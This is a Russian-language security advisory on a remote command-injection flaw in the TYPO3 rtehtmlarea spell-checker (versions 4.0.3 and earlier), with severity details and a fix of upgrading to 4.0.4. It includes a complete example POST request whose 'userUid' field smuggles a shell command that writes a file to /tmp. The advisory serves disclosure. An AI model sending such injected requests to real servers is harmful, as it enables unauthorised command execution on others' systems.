Дата публикации: | 26.12.2006 |
Дата изменения: | 15.11.2008 |
Всего просмотров: | 2428 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | TYPO3 4.x |
Уязвимые версии: TYPO3 4.0.3 и более ранние версии. rtehtmlarea (расширение к TYPO3) 1.4.2 и более ранние версии. Описание: Уязвимость существует из-за недостаточной обработки входных данных в параметре "userUid" в сценарии sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-check-logic.php перед использованием их в команде "aspell". Удаленный пользователь может выполнить произвольные команды на системе. Для успешной эксплуатации уязвимости опция "safe_mode" должна быть отключена в конфигурационном файла PHP. Пример:
--- post request --- POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell- check-logic.php?id=1 HTTP/1.1 Host: www.typo3host.abc User-Agent: none Content-Type: application/x-www-form-urlencoded Content-Length: 111
psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+ /tmp/shell.txt+%23&enablePersonalDicts=true --- /post request --- URL производителя: typo3.org Решение: Установите последнюю версию (4.0.4) с сайта производителя. |
|
Ссылки: | Remote Command Execution in TYPO3 |